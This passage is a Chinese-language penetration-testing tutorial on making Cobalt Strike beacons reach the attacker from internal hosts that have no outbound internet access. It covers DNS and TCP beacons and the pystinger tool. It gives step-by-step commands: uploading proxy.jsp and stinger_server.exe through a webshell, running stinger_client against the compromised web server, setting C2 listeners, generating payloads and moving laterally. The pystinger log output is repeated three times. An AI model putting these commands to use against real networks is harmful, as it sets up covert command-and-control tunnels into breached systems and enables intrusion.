三、cs上线
生成cs的stageless上线马,执行上线
stageless 马 dns有x64版本 , stager没有
上线之后是黑框,需要使用checkin命令让dns beacon强制回连teamserver
PS:需要多等一会
这样就可以正常交互了:
边缘机器不出网
方法一、TCP Beacon 正向连接
<font color='red'>应用场景:边缘机器各种协议均不出网,但是可以正向访问到。</font >
使用:
先让自己的攻击机上线
然后,如"上线方法四"一样,使用TCP Beacon生成一个stageless形式的木马,上传到目标机器,并运行。
在攻击机(中转机器)的Beacon里使用connect [ip address] [port]命令进行正向连接,即可上线:
方法二、使用pystinger(毒刺)工具
<font color='red'>应用场景:边缘机器各种协议均不出网,但是存在web服务,已经拿到webshell。</font >
项目地址:
https://github.com/FunnyWolf/pystinger
简单原理:
Pystinger来实现内网反向代理,利用http协议将目标机器端口映射至cs服务端监听端口,能在只能访问web服务且不出网的情况下可以使其上线cs
使用
地址:
https://github.com/FunnyWolf/pystinger/blob/master/readme_cn.md
这里直接复制过来了:
假设不出网服务器域名为 http://example.com:8080 ,服务器内网IP地址为192.168.3.11
SOCK4代理
- proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回
UTF-8 - 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行
start D:/XXX/stinger_server.exe启动服务端
不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
- vps执行
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 - 如下输出表示成功
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ... 2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass 2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000 2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ... 2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass 2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp 2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ... 2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass 2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config --- 2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => [] 2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010 2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO 2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => [] 2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200 2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01 2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config --- 2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020 2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
- 此时已经在vps
127.0.0.1:60000启动了一个example.com所在内网的socks4a代理 - 此时已经将目标服务器的
127.0.0.1:60020映射到vps的127.0.0.1:60020
cobalt strike单主机上线
- proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回
UTF-8 - 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行
start D:/XXX/stinger_server.exe启动服务端
不要直接运行D:/XXX/stinger_server.exe,会导致tcp断连
- stinger_client命令行执行
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 - 如下输出表示成功
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ... 2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass 2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000 2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ... 2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass 2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp 2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ... 2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass 2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config --- 2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => [] 2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010 2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO 2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => [] 2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200 2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01 2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config --- 2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020 2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
- cobalt strike添加监听,端口选择输出信息
RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为127.0.0.1 - 生成payload,上传到主机运行后即可上线
cobalt strike多主机上线
- proxy.jsp上传到目标服务器,确保 http://example.com:8080/proxy.jsp 可以访问,页面返回
UTF-8 - 将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行
start D:/XXX/stinger_server.exe 192.168.3.11
- 启动服务端
192.168.3.11可以改成0.0.0.0
- stinger_client命令行执行
./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 - 如下输出表示成功
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ... 2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass 2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000 2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ... 2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass 2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp 2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ... 2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass 2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config --- 2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => [] 2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010 2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO 2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020 2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => [] 2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200 2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01 2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config --- 2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020 2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020 2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start 2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000 2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
- cobalt strike添加监听,端口选择RAT Config中的Handler/LISTEN中的端口(通常为60020),beacons为192.168.3.11(example.com的内网IP地址)
- 生成payload,上传到主机运行后即可上线
- 横向移动到其他主机时可以将payload指向192.168.3.11:60020即可实现出网上线
定制Header及proxy
- 如果webshell需要配置Cookie或者Authorization,可通过--header参数配置请求头
--header "Authorization: XXXXXX,Cookie: XXXXX"
- 如果webshell需要通过代理访问,可通过--proxy设置代理
--proxy "socks5:127.0.0.1:1081"
测试
攻击机:192.168.1.89
假设我们在拿下一台目标主机,但是无法连接外网。
使用 pystinger 工具进行 CS 上线,下载地址,通过 webshell 实现内网 SOCK4 代理,端口映射可以使目标不出网情况下在 CS 上线。
首先上传对应版本脚本到目标服务器。
将stinger_server.exe上传到目标服务器,蚁剑/冰蝎执行start stinger_server.exe启动服务端
把 stinger_client 上传到 teamserver 服务器,-w 指定 proxy 的 url 地址运行。
chmod +x stinger_client ./stinger_client -w http://192.168.1.70/proxy.php -l 127.0.0.1 -p 60000
CS 新建监听器,设置为目标机器的内网 IP,端口默认 60020。(teamserver 服务器和执行 stinger_client 应为同一台服务器)
生成木马,上传目标服务器并执行。可看到 CS 有新上线主机。
